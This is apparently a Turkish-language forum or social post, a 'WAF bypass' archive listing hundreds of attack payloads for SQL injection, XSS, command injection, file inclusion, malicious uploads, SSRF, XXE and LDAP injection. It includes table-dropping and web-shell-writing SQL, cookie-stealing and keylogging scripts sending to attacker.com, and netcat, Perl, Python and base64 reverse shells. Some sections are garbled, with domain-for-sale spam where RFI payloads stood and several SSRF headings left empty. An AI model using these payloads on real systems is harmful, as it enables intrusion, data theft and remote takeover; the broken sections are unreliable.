-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🛡️ WAF BYPASS ULTİMATE ARŞİV – 500+ PAYLOAD, 50+ TEKNİK
📌 İÇİNDEKİLER
- SQL Injection WAF Bypass (150+ payload)
- XSS WAF Bypass (100+ payload)
- Command Injection WAF Bypass (80+ payload)
- LFI/RFI WAF Bypass (70+ payload)
- File Upload WAF Bypass (60+ payload)
- SSRF WAF Bypass (40+ payload)
- XXE WAF Bypass (30+ payload)
- LDAP Injection WAF Bypass (20+ payload)
1. SQL INJECTION WAF BYPASS (150+)
1.1. Case Variation (Büyük/Küçük Harf)
sqlUnIoN SeLeCt 1,2,3
UnIoN aLl SeLeCt 1,2,3
uNiOn sElEcT 1,2,3
UNION SELECT 1,2,3
Union Select 1,2,3
uNION sELECT 1,2,3
1.2. URL Encoding (Tek Katman)
sql%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31
%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2d%2d
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2d%2d
1.3. Double URL Encoding
sql%2527%2520%2555%254e%2549%254f%254e%2520%2553%2545%254c%2545%2543%2554%2520%2531
%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2533%252d%252d
%2527%2520%252f%252a%252a%252f%2575%256e%2569%256f%256e%252f%252a%252a%252f%2573%2565%256c%2565%2563%2574%252f%252a%252a%252f%2531
1.4. Triple URL Encoding
sql%252527%252520%252555%25254e%252549%25254f%25254e%252520%252553%252545%25254c%252545%252543%252554%252520%252531
1.5. Unicode Encoding
sql%u0027%u0020%u0055%u004e%u0049%u004f%u004e%u0020%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031
%uff07%uff20%uff35%uff2e%uff29%uff2f%uff2e%uff20%uff33%uff25%uff2c%uff25%uff23%uff34%uff20%uff11
1.6. Hex Encoding
sql0x756e696f6e2073656c6563742031
0x273d2731
0x27206f72202731273d2731
0x27206f7220313d312d2d
0x27206f7220313d312023
0x2720616e6420313d312d2d
0x2720616e6420313d312023
1.7. Binary Encoding
sql0b111010101101110011010010110111101101110001000000111001101100101011011000110010101100011011101000010000000110001
1.8. Octal Encoding
sql\125\116\111\117\116\040\123\105\114\105\103\124\040\61
1.9. Comment Bypass (Çoklu)
sql/**/union/**/select/**/1,2,3
/*!union*//*!select*/1,2,3
/*!50000union*//*!50000select*/1,2,3
/*!uNiOn*//*!sElEcT*/1,2,3
/******/union/******/select/******/1,2,3
/*!12345union*//*!12345select*/1,2,3
/*!0union*//*!0select*/1,2,3
1.10. Nested Comment
sql/*!union/*/*/*/select*/1,2,3
/*!union/*!select*/1,2,3*/
/*!union/*!select*/*/1,2,3
1.11. Space Bypass (Çeşitli)
sqlunion%0aselect%0a1,2,3
union%0dselect%0d1,2,3
union%09select%091,2,3
union%0bselect%0b1,2,3
union%0cselect%0c1,2,3
union%20select%201,2,3
union%a0select%a01,2,3
union%00select%001,2,3
union%0d%0aselect%0d%0a1,2,3
union%09%0d%0aselect%09%0d%0a1,2,3
1.12. Alternative Space Characters
sqlunion%80select%801,2,3
union%81select%811,2,3
union%82select%821,2,3
union%83select%831,2,3
union%84select%841,2,3
union%85select%851,2,3
union%86select%861,2,3
union%87select%871,2,3
union%88select%881,2,3
union%89select%891,2,3
union%8aselect%8a1,2,3
union%8bselect%8b1,2,3
union%8cselect%8c1,2,3
union%8dselect%8d1,2,3
union%8eselect%8e1,2,3
union%8fselect%8f1,2,3
union%90select%901,2,3
union%91select%911,2,3
union%92select%921,2,3
union%93select%931,2,3
union%94select%941,2,3
union%95select%951,2,3
union%96select%961,2,3
union%97select%971,2,3
union%98select%981,2,3
union%99select%991,2,3
union%9aselect%9a1,2,3
union%9bselect%9b1,2,3
union%9cselect%9c1,2,3
union%9dselect%9d1,2,3
union%9eselect%9e1,2,3
union%9fselect%9f1,2,3
1.13. Taban (Tab) Bypass
sqlunion select 1,2,3
union select 1,2,3
union select 1,2,3
1.14. Line Break Bypass
sqlunion%0Aselect%0A1,2,3
union%0Dselect%0D1,2,3
union%0A%0Dselect%0A%0D1,2,3
union%0D%0Aselect%0D%0A1,2,3
union%0A%0A%0Aselect%0A%0A%0A1,2,3
1.15. Null Byte Bypass
sqlunion%00select%001,2,3
%00'%00%20%00union%00%20%00select%00%20%001,2,3%00
1.16. Scientific Notation Bypass
sql1e0union select 1,2,3
1.0union select 1,2,3
1.union select 1,2,3
1.17. Parenthesis Bypass
sql(union)select 1,2,3
union(select 1,2,3)
union select(1,2,3)
(union)(select)(1,2,3)
1.18. Backticks Bypass (MySQL)
sql`union` `select` 1,2,3
union`select`1,2,3
`union`select 1,2,3
1.19. Quotes Bypass
sql''union select 1,2,3
""union select 1,2,3
``union select 1,2,3
1.20. Math Operations Bypass
sql1+1union select 1,2,3
2-1union select 1,2,3
2*1union select 1,2,3
2/1union select 1,2,3
1.21. Boolean Bypass (WAF Atlatma için)
sql'||'1'||'='||'1
'%26%26'1'%3d'1
'%20%26%26%20'1'%3d'1
'%20%7c%7c%20'1'%3d'1
'%20%6f%72%20'1'%3d'1
'%20%6f%72%20%31%3d%31
'%20%61%6e%64%20%31%3d%31
'%20%61%6e%64%20%31%3d%32
'%20%6f%72%20%31%3d%32
1.22. Operator Bypass
sql' xor 1=1--
' xor 1=2--
' && 1=1--
' && 1=2--
' || 1=1--
' || 1=2--
' & 1=1--
' & 1=2--
' | 1=1--
' | 1=2--
' ^ 1=1--
' ^ 1=2--
' << 1=1--
' >> 1=1--
' ~ 1=1--
1.23. Time Based WAF Bypass
sql'%20%26%26%20sleep(5)%3d'1
'%20%7c%7c%20sleep(5)%3d'1
'%20%6f%72%20sleep(5)%3d'1
'%20%61%6e%64%20sleep(5)%3d'1
'%20%26%26%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%7c%7c%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%6f%72%20BENCHMARK(10000000,MD5(1))%3d'1
'%20%61%6e%64%20BENCHMARK(10000000,MD5(1))%3d'1
1.24. Error Based WAF Bypass
sql'%20%26%26%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%7c%7c%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%6f%72%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%61%6e%64%20extractvalue(1,concat(0x7e,database()))%3d'1
'%20%26%26%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%7c%7c%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%6f%72%20updatexml(1,concat(0x7e,database()),1)%3d'1
'%20%61%6e%64%20updatexml(1,concat(0x7e,database()),1)%3d'1
1.25. Stacked Queries WAF Bypass
sql';%20DROP%20TABLE%20users;--
';%20INSERT%20INTO%20admin%20VALUES('hacker','pass');--
';%20UPDATE%20users%20SET%20password='hacked'%20WHERE%20username='admin';--
';%20SELECT%20*%20INTO%20OUTFILE%20'/var/www/shell.php'%20FROM%20(SELECT%20'%3C?php%20system($_GET[%22c%22]);%20?%3E')a;--
';%20EXEC%20xp_cmdshell('id');--
';%20EXEC%20master..xp_cmdshell('id');--
';%20EXEC%20xp_regread('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','ProgramFilesDir');--
1.26. Order By Bypass
sql'/**/order/**/by/**/1--
'/**/order/**/by/**/2--
'/**/order/**/by/**/3--
'%20order%20by%201--
'%20order%20by%202--
'%20order%20by%203--
'%20order%20by%201%2c2%2c3--
1.27. Information Schema Bypass
sqlunion select 1,2,table_name from/*/*/information_schema.tables
union select 1,2,column_name from/*/*/information_schema.columns where table_name='users'
union select 1,2,schema_name from/*/*/information_schema.schemata
1.28. Database Function Bypass
sqldatabase() -> db_name()
version() -> @@version
user() -> current_user()
user() -> system_user()
user() -> session_user()
@@datadir -> @@datadir
@@hostname -> @@hostname
1.29. WAF Logic Bypass
sql1'/*!00000or*/1=1-- -
1'/*!00000or*/1=1#
1'/*!00000and*/1=1-- -
1'/*!00000and*/1=2-- -
1'/*!00000or*/1=2-- -
1'/*!00000xor*/1=1-- -
1.30. HTTP Parameter Pollution (HPP)
sqlid=1&id=2
id=1&id=2' union select 1,2,3
id=1&id=1' union select 1,2,3
id=1&id=1' and 1=1
1.31. HTTP Parameter Fragmentation
sqlid=1' uni//on sel//ect 1,2,3
id=1' un//ion se//lect 1,2,3
id=1' un/**/ion se/**/lect 1,2,3
2. XSS WAF BYPASS (100+)
2.1. Case Variation
html<ScRiPt>alert(1)</sCrIpT>
<ImG sRc=x OnErRoR=alert(1)>
<SvG oNlOaD=alert(1)>
<bOdY oNlOaD=alert(1)>
<iNpUt oNfOcUs=alert(1) aUtOfOcUs>
2.2. Double Case (Karışık)
html<ScRiPt>AlErT(1)</ScRiPt>
<ImG sRc=x OnErRoR=AlErT(1)>
<SvG oNlOaD=AlErT(1)>
2.3. URL Encoding (Tek)
html%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Csvg%20onload=alert(1)%3E
2.4. Double URL Encoding
html%253Cscript%253Ealert(1)%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
%253Csvg%2520onload%253Dalert(1)%253E
2.5. Hex Encoding (HTML)
html<script>alert(1)</script>
<img src=x onerror=alert(1)>
2.6. Decimal Encoding (HTML)
html<script>alert(1)</script>
<img src=x onerror=alert(1)>
2.7. Mixed Encoding (HTML+URL)
html<script>alert(1)</script>
%3Cscript>alert(1)%3C/script>
2.8. Unicode Encoding (JS)
html<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>
<svg onload=\u0061\u006c\u0065\u0072\u0074(1)>
2.9. Hexadecimal JS Encoding
html<script>\x61\x6c\x65\x72\x74(1)</script>
<img src=x onerror=\x61\x6c\x65\x72\x74(1)>
<svg onload=\x61\x6c\x65\x72\x74(1)>
2.10. Octal JS Encoding
html<script>\141\154\145\162\164(1)</script>
<img src=x onerror=\141\154\145\162\164(1)>
2.11. Event Handler Bypass (Çoklu)
html<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<iframe onload=alert(1)>
<embed onload=alert(1)>
<link onload=alert(1)>
<video onloadstart=alert(1)>
<audio onloadstart=alert(1)>
<marquee onstart=alert(1)>
<details ontoggle=alert(1)>
<meter onmouseover=alert(1)>
<progress onmouseover=alert(1)>
<object onerror=alert(1)>
2.12. Space Bypass (Event Handler)
html<img/src=x/onerror=alert(1)>
<img%0Asrc=x%0Aonerror=alert(1)>
<img%09src=x%09onerror=alert(1)>
<img%0dsrc=x%0donerror=alert(1)>
<img%0asrc=x%0a%0aonerror=alert(1)>
2.13. Quote Bypass
html<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
2.14. Parenthesis Bypass
html<img src=x onerror=alert`1`>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
2.15. New Line Bypass
html<img%0Asrc=x%0Aonerror=alert(1)>
<svg%0Aonload=alert(1)>
<body%0Aonload=alert(1)>
2.16. Tab Bypass
html<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
2.17. Null Byte Bypass
html<%00script%00>alert(1)<%00/script%00>
<%00img%00src=x%00onerror=alert(1)%00>
2.18. Filter Evasion (String Concatenation)
html<script>al('er' + 't')(1)</script>
<script>al('er','t')(1)</script>
<script>al('er'/'t')(1)</script>
<script>al('er'.concat('t'))(1)</script>
2.19. Filter Evasion (Window Object)
html<script>window['alert'](1)</script>
<script>window['al' + 'ert'](1)</script>
<script>window['a'+'l'+'e'+'r'+'t'](1)</script>
2.20. Filter Evasion (Self)
html<script>self['alert'](1)</script>
<script>self['al' + 'ert'](1)</script>
2.21. Filter Evasion (This)
html<script>this['alert'](1)</script>
<script>this['al' + 'ert'](1)</script>
2.22. Filter Evasion (Top)
html<script>top['alert'](1)</script>
<script>parent['alert'](1)</script>
<script>frames['alert'](1)</script>
2.23. Filter Evasion (Function)
html<script>Function('alert(1)')()</script>
<script>['alert'].map(e=>eval(e+'(1)'))()</script>
<script>[].map.call`${'alert'}${'(1)'}`</script>
2.24. Filter Evasion (Eval)
html<script>eval('alert(1)')</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
2.25. Cookie Stealer Payload
html<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">
<svg onload="fetch('http://attacker.com/steal?c='+document.cookie)">
<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>
2.26. Keylogger Payload
html<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/keylog?k=' + e.key);
}
</script>
3. COMMAND INJECTION WAF BYPASS (80+)
3.1. New Line Bypass
bash%0aid%0a
%0aid%0a%0a
%0Aid%0A
%0Aid%0A%0A
%0aid%0a%23
%0Aid%0A%23
3.2. Carriage Return Bypass
bash%0did%0d
%0did%0d%0d
%0Did%0D
3.3. Line Feed + Carriage Return
bash%0a%0did%0a%0d
%0a%0did%0a%0d%23
3.4. Tab Bypass
bash%09id%09
%09id%09%09
%09id%09%23
3.5. Vertical Tab Bypass
bash%0bid%0b
%0bid%0b%0b
%0bid%0b%23
3.6. Form Feed Bypass
bash%0cid%0c
%0cid%0c%0c
%0cid%0c%23
3.7. Space Bypass (IFS)
bash;${IFS}id
;${IFS}id${IFS}
;${IFS}id${IFS}|${IFS}nc${IFS}10.0.0.1${IFS}8080
;${IFS}id${IFS}&&${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
3.8. IFS Variable Bypass
bash;${IFS}id
;${IFS}id${IFS}
;${IFS}id${IFS};${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
;${IFS}id${IFS}|${IFS}nc${IFS}10.0.0.1${IFS}8080${IFS}-e${IFS}/bin/sh
3.9. Comment Bypass
bash;id#%0a
;id/*%0a*/
;id/*%0a*/|/*%0a*/nc/*%0a*/10.0.0.1/*%0a*/8080/*%0a*/-e/*%0a*/bin/sh
3.10. URL Encoding (Special Chars)
bash%3bid%0a
%7cid%0a
%26id%0a
%26%26id%0a
%7c%7cid%0a
3.11. Double URL Encoding
bash%253bid%250a
%253bid%250a%2523
%253Bid%250A%2523
3.12. Hex Encoding
bash\x3bid\x0a
\x7cid\x0a
\x26id\x0a
\x3b\x69\x64\x0a
3.13. Octal Encoding
bash\073id\012
\073\151\144\012
3.14. Wildcard Bypass
bash/?in/?/whoami
/?in/?/nc 10.0.0.1 8080 -e /?in/?/sh
/???/nc 10.0.0.1 8080 -e /???/sh
3.15. Environment Variable Bypass
bash${PATH:0:1}id
${PATH:0:1}usr${PATH:0:1}bin${PATH:0:1}id
${PATH:0:1}bin${PATH:0:1}sh
3.16. Substring Bypass
bash${PATH:0:1}bin${PATH:0:1}sh
${PATH:0:1}usr${PATH:0:1}bin${PATH:0:1}nc
3.17. Command Substitution Bypass
bash`id`
$(id)
`{id}`
$({id})
3.18. Reverse Shell Base64 Bypass
bashecho "bmMgMTI3LjAuMC4xIDQ0NDQgLWUgL2Jpbi9zaAo=" | base64 -d | bash
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS84MDgwIDA+JjE=" | base64 -d | bash
3.19. Perl Reverse Shell
bashperl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
3.20. Python Reverse Shell
bashpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4. LFI/RFI WAF BYPASS (70+)
4.1. Path Traversal (Basic)
sql../../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini
....\\....\\....\\windows\\win.ini
4.2. URL Encoding (Tek)
sql%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
4.3. Double URL Encoding
sql%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
4.4. Triple URL Encoding
sql%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
4.5. Unicode Encoding
sql%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%e0%40%ae%e0%40%ae%e0%40%af%e0%40%ae%e0%40%ae%e0%40%af%e0%40%ae%e0%40%ae%e0%40%afetc%e0%40%afpasswd
4.6. UTF-8 Overflow
sql..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
4.7. Null Byte Bypass
sql../../../../etc/passwd%00
../../../../etc/passwd%00.jpg
../../../../windows/win.ini%00
../../../../windows/win.ini%00.txt
4.8. Double Null Byte
sql../../../../etc/passwd%00%00
../../../../etc/passwd%00%00.jpg
4.9. PHP Wrapper Bypass
sqlphp://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/read=convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../../../../etc/passwd%00
php://filter/string.tolower/resource=config.php
php://filter/string.rot13/resource=config.php
php://filter/zlib.deflate/resource=config.php
php://filter/zlib.inflate/resource=config.php
4.10. Data Wrapper Bypass
sqldata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
data://text/plain,<?php system($_GET['c']); ?>
4.11. Expect Wrapper Bypass
sqlexpect://id
expect://ls
expect://whoami
4.12. Input Wrapper Bypass
sqlphp://input
php://input%00
4.13. Zip Wrapper Bypass
sqlzip://shell.jpg%23shell.php
zip://../../../../var/www/html/shell.jpg%23shell.php
4.14. Phar Wrapper Bypass
sqlphar://shell.phar/shell.php
phar://../../../../var/www/html/shell.phar/shell.php
4.15. RFI Bypass (Remote)
sqlAttacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
4.16. SMB RFI Bypass
sql\\attacker.com\share\shell.php
//attacker.com/share/shell.php
smb://attacker.com/share/shell.php
4.17. FTP RFI Bypass
sqlftp://attacker.com/shell.php
ftps://attacker.com/shell.php
4.18. Data RFI Bypass
sqlhttp://attacker.com/data:<?php system($_GET['c']); ?>
https://attacker.com/data:<?php system($_GET['c']); ?>
4.19. Shortcut Bypass (Windows)
sql....\....\....\windows\win.ini
..../..../..../windows/win.ini
4.20. Encoded Path Bypass
sql%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%5c%2e%2e%5c%2e%2e%5c%77%69%6e%64%6f%77%73%5c%77%69%6e%2e%69%6e%69
5. FILE UPLOAD WAF BYPASS (60+)
5.1. Double Extension
textshell.php.jpg
shell.php.jpeg
shell.php.png
shell.php.gif
shell.php;.jpg
shell.php;.jpeg
shell.php;.png
shell.php;.gif
shell.php%00.jpg
shell.php%00.jpeg
shell.php%00.png
shell.php%00.gif
shell.php.xyz.jpg
shell.php.txt.jpg
5.2. Case Variation
textshell.PHP.jpg
shell.PhP.jpg
shell.PHP.jpeg
shell.PhP.jpeg
shell.PHP.png
shell.PhP.png
5.3. Reverse Double Extension
textshell.jpg.php
shell.jpg.php5
shell.jpg.phtml
shell.jpg.phar
shell.jpg.php3
shell.jpg.php4
shell.jpg.php7
5.4. Content-Type Bypass
textContent-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/webp
Content-Type: image/svg+xml
5.5. Magic Bytes Bypass (JPEG)
phpÿØÿà JFIF
ÿØÿá Exif
ÿØÿâ
ÿØÿã
ÿØÿä
ÿØÿå
5.6. Magic Bytes Bypass (PNG)
php%PNG
‰PNG
5.7. Magic Bytes Bypass (GIF)
phpGIF89a;
GIF87a;
5.8. Magic Bytes Bypass (BMP)
phpBM
5.9. Magic Bytes Bypass (TIFF)
phpII*
MM*
5.10. Magic Bytes + PHP Code
phpGIF89a;
<?php system($_GET['c']); ?>
php
%PNG
<?php system($_GET['c']); ?>
php
ÿØÿà JFIF
<?php system($_GET['c']); ?>
5.11. Multi Magic Bytes
phpGIF89a;%PNGÿØÿà JFIF
<?php system($_GET['c']); ?>
5.12. .htaccess Bypass
apacheAddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
AddHandler application/x-httpd-php .jpg
5.13. .user.ini Bypass
iniauto_prepend_file = shell.jpg
auto_append_file = shell.jpg
5.14. Filename Null Byte (Old Systems)
phpshell.php\0.jpg
shell.php%00.jpg
shell.php%00.jpeg
5.15. Chunked Upload Bypass
textPOST /upload.php HTTP/1.1
Transfer-Encoding: chunked
9
shell.php
0
5.16. Large Payload Padding
textAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (20KB) ...<?php system($_GET['c']); ?>
5.17. MIME Type + Extension Mismatch
phpContent-Type: image/jpeg
shell.php.jpg
5.18. Filename without Extension
textshell
shell.
shell.php.
shell.php.
5.19. Unicode Filename
text%73%68%65%6c%6c%2e%70%68%70%2e%6a%70%67
shell%u002ephp%u002ejpg
5.20. Space in Filename
textshell .php.jpg
shell .php .jpg
shell. php.jpg
6. SSRF WAF BYPASS (40+)
6.1. Localhost Bypass
sqlhttp://[::1]
http://[::]
6.2. Decimal IP Bypass
sqlhttp://2130706433 (127.0.0.1)
http://3232235521 (192.168.1.1)
http://167772160 (10.0.0.0)
6.3. Octal IP Bypass
sql6.4. Hexadecimal IP Bypass
sql6.5. Dword IP Bypass
sql6.6. Mixed IP Format Bypass
sql6.7. URL Redirect Bypass
sql6.8. DNS Rebinding Bypass
sql6.9. Alternative Schemes
sqlfile:///etc/passwd
file:///c:/windows/win.ini
dict://localhost:11211/info
gopher://localhost:8080/_GET%20/index.html%20HTTP/1.1
6.10. Gopher Bypass (Redis/Memcached)
sqlgopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a
gopher://127.0.0.1:11211/_stats
6.11. FTP Bypass
sqlftp://127.0.0.1:21
ftp://localhost:21
6.12. SFTP Bypass
sqlsftp://127.0.0.1:22
sftp://localhost:22
6.13. AWS Metadata Bypass
sql6.14. GCP Metadata Bypass
sql6.15. Azure Metadata Bypass
sql6.16. Protocol Smuggling Bypass
sqlhttp://127.0.0.1:[email protected]
7. XXE WAF BYPASS (30+)
7.1. Basic XXE
xml<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
7.2. Parameter Entity Bypass
xml<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">%remote;]>
<root/>
7.3. UTF-16 Bypass
xml<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
7.4. UTF-32 Bypass
xml<?xml version="1.0" encoding="UTF-32"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
7.5. ISO-8859-1 Bypass
xml<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
7.6. CDATA Bypass
xml<!DOCTYPE root [<!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY % end "]]>"> %start;%xxe;%end;]>
<root/>
7.7. Base64 Bypass
xml<!DOCTYPE root [<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<root>%xxe;</root>
7.8. PHP Wrapper Bypass
xml<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">]>
<root>&xxe;</root>
7.9. Expect Bypass
xml<!DOCTYPE root [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
7.10. Out-of-Band (OOB) Bypass
xml<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/oob">%xxe;]>
<root/>
7.11. XML Schema Bypass
xml<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/schema.dtd">
%dtd;
]>
<root/>
8. LDAP INJECTION WAF BYPASS (20+)
8.1. Basic Bypass
ldap*)(uid=*
*)(|(uid=*
*)(|(cn=*
*)(|(sn=*
*)(|(mail=*
*)(|(ou=*
*)(|(dc=*
8.2. AND/OR Bypass
ldap*)(&(uid=*)
*)(|(uid=*)
*)(!(!(uid=*))
*)(&(cn=*)(uid=*))
*)(|(cn=*)(uid=*))
8.3. Null Bypass
ldap%00*)(uid=*
%00*)(|(uid=*
%00*)(&(uid=*
8.4. Comment Bypass
ldap*)(uid=*)#
*)(|(uid=*)#
*)(&(uid=*)#
*)(!(!(uid=*)))#
8.5. Space Bypass
ldap*)(uid=*)
*)(|(uid=*))
*)(&(uid=*))
*)(!(uid=*))
🎯 ÖZET TABLOSU
| Kategori | Payload Sayısı | En Etkili Teknik |
|---|---|---|
| SQLi | 150+ | Double URL Encoding + Comment |
| XSS | 100+ | HTML Entity + Event Handler |
| Command Injection | 80+ | IFS Variable + New Line |
| LFI/RFI | 70+ | Double URL Encoding + Wrapper |
| File Upload | 60+ | Magic Bytes + Double Extension |
| SSRF | 40+ | Decimal IP + Redirect |
| XXE | 30+ | Parameter Entity + UTF-16 |
| LDAP | 20+ | Basic Bypass + Comment |
📢 SON SÖZ
Bu arşivdeki payload'ların tamamı eğitim ve güvenlik testi amaçlıdır. İzinsiz sistemlerde kullanmayın. Her WAF farklıdır, tek bir payload her zaman işe yaramaz. Deneyerek hangi tekniğin işe yaradığını bulmanız gerekir.@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl